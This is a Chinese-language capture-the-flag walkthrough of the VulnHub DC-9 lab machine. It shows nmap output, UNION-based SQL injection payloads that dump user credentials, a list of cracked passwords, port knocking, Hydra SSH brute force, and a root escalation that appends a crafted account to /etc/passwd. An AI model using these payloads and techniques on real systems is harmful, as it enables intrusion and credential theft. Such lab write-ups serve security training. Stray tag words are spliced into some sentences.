vulnhub： DC 9

時間 2020-11-30

標籤 html python linux git github sql shell 數據庫 c# bash 欄目 HTML 简体版

原文原文鏈接

信息收集：html

root@kali:/opt/test# nmap -A -v 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:51 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating NSE at 21:51
Completed NSE at 21:51, 0.00s elapsed
Initiating ARP Ping Scan at 21:51
Scanning 192.168.76.137 [1 port]
Completed ARP Ping Scan at 21:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:51
Completed Parallel DNS resolution of 1 host. at 21:52, 13.01s elapsed
Initiating SYN Stealth Scan at 21:52
Scanning 192.168.76.137 [1000 ports]
Discovered open port 80/tcp on 192.168.76.137
Completed SYN Stealth Scan at 21:52, 0.14s elapsed (1000 total ports)
Initiating Service scan at 21:52
Scanning 1 service on 192.168.76.137
Completed Service scan at 21:52, 6.04s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.76.137
NSE: Script scanning 192.168.76.137.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.22s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.01s elapsed
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Nmap scan report for 192.168.76.137
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:79:DB:F0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 14.277 days (since Mon Sep  7 15:13:16 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros

訪問80端口的Web服務，在search目錄下存在sql注入，union查詢判斷列數，獲得列數爲6：python

讀取數據庫名：linux

search=Mary'%20union%20SELECT%20database(),2,3,4,5,6;%20--%20

獲得數據庫名：staffgit

讀取數據庫中的表名：github

search=Mary'%20union%20SELECT%20TABLE_NAME,2,3,4,5,6%20FROM%20information_schema.tables%20WHERE%20TABLE_SCHEMA%3ddatabase();%20--%20

獲得表名：

讀取列名：sql

search=Mary'%20union%20SELECT%20column_name,2,3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name='Users';%20--%20

從Users表中讀取ID、用戶名、密碼：shell

search=Mary'%20union%20SELECT%20UserID,2,3,Username,Password,6%20FROM%20Users;%20--%20

獲得用戶名和密碼：admin: 856f5de590ef37314e7c3bdf6f8a66dc數據庫

在線解密獲得明文：transorbital1c#

使用該用戶名登陸，在manage目錄下存在本地文件包含：bash

嘗試包含日誌文件失敗，沒法經過包含日誌實現getshell。前文中sql注入還有另一個數據庫，將數據庫中的信息dump出來：

讀取數據庫信息：

search=Mary' union select schema_name,2,3,4,5,6 from information_schema.schemata;--

讀取users中的表：

search=Mary' union select table_name,2,3,4,5,6 from information_schema.tables where table_schema='users';--

從UserDetails中讀取列名：

search=Mary' union select column_name,2,3,4,5,6 from information_schema.columns where table_schema='users' and table_name='UserDetails';--

讀取username和password字段：

search=Mary' union select 1,2,3,username,password,6 from users.UserDetails;--

將用戶名和密碼整理成兩個文件，獲得用戶名和密碼對應關係以下：

user        password
marym        3kfs86sfd
julied        468sfdfsd2
fredf        4sfd87sfd1
barneyr        RocksOff
tomc        TC&TheBoyz
jerrym        B8m#48sd
wilmaf        Pebbles
bettyr        BamBam01
chandlerb    UrAG0D!
joeyt        Passw0rd
rachelg        yN72#dsd
rossg        ILoveRachel
monicag        3248dsds7s
phoebeb        smellycats
scoots        YR3BVxxxw87
janitor        Ilovepeepee
janitor2    Hawaii-Five-0

結合etc/passwd文件，用戶在passwd中都有帳號，嘗試使用hydra爆破，可是22端口的訪問被過濾，這是因爲使用了knockd服務（https://www.cnblogs.com/bask/p/9159197.html）

須要先鏈接目標主機的7469，8475，9842 3個端口才能打開鏈接：

root@kali:/opt/test# ssh 192.168.76.137
ssh: connect to host 192.168.76.137 port 22: Connection refused
root@kali:/opt/test# nmap -p7469,8475,9842 -Pn --max-retries=0 192.168.76.137
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-23 00:16 CST
Nmap scan report for 192.168.76.137
Host is up (0.00041s latency).

PORT     STATE  SERVICE
7469/tcp closed unknown
8475/tcp closed unknown
9842/tcp closed unknown
MAC Address: 00:0C:29:79:DB:F0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds
root@kali:/opt/test# ssh 192.168.76.137
The authenticity of host '192.168.76.137 (192.168.76.137)' can't be established.
ECDSA key fingerprint is SHA256:o2Ii/WX152zZCRlVrfXpNnX8mvNwYfOWhkMscAr+sMs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.76.137' (ECDSA) to the list of known hosts.
root@192.168.76.137's password:

此時，使用hydra結合以前的用戶名密碼進行爆破：

root@kali:/opt/test# hydra -L user.txt -P pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:20:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.76.137   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.76.137   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:21:13

獲得3組用戶名密碼。依次登陸後發現，3者都沒有sudo權限，可是在janitor的home目錄下有隱藏文件夾：

root@kali:/opt/test# ssh janitor@192.168.76.137
janitor@192.168.76.137's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Sep 23 10:21 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Sep 23 10:21 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for janitor: 
Sorry, user janitor may not run sudo on dc-9.
janitor@dc-9:~$ more .secrets-for-putin/

*** .secrets-for-putin/: directory ***

janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ more passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$

收集該密碼存爲文本，再次使用以前的用戶名列表進行爆破：

root@kali:/opt/test# cat putin_pass.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHt
root@kali:/opt/test# hydra -L user.txt -P putin_pass.txt ssh://192.168.76.137
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-23 00:34:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 102 login tries (l:17/p:6), ~7 tries per task
[DATA] attacking ssh://192.168.76.137:22/
[22][ssh] host: 192.168.76.137   login: fredf   password: B4-Tru3-001
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-23 00:35:09

該帳號有一個無需密碼以root身份執行的服務：

fredf@dc-9:~$ ls -la
total 12
drwx------  3 fredf fredf 4096 Sep 23 10:34 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Sep 23 10:34 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

該路徑下的test是一個ELF文件，嘗試經過find模糊查找test相關的文件：

fredf@dc-9:/opt/devstuff/dist/test$ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test*" 2>/dev/null
/opt/devstuff/test.spec
/opt/devstuff/build/test
/opt/devstuff/build/test/test
/opt/devstuff/test.py
/opt/devstuff/dist/test
/opt/devstuff/dist/test/test

在上層父路徑下找到一個test.py文件，該文件的做用是將A文件的內容追加到B文件後面：

fredf@dc-9:/opt/devstuff$ more test.py 
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

如此能夠考慮將新建root用戶信息寫入文件A將文件A中的信息追寫到/etc/passwd，實現提權。

基於sha-512生成一個123456的密碼：

root@kali:/opt/test# mkpasswd -m sha-512 123456
$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71

拼接一個新用戶的信息：

admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

寫入文件中：

fredf@dc-9:/opt/devstuff/dist/test$ vi /tmp/new_user
fredf@dc-9:/opt/devstuff/dist/test$ cat /tmp/new_user
admin:$6$1lH.HY2dm4IDDbD4$qgNP3uMMsVIY4CZ4Wgf7rHz12DVW3F/SSZUqHy0hg3kdiVOeSI7b2d2XlJEcUq9LRq3ttXu.QlvZCzs/7h/u71:0:0:admin:/root:/bin/bash

使用sudo執行test將用戶信息寫入/etc/passwd,而後切換用戶身份爲admin，密碼123456:

fredf@dc-9:/opt/devstuff/dist/test$ sudo /opt/devstuff/dist/test/test /tmp/new_user /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test# whoami
root

獲得root權限，拿到flag:

root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt 


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.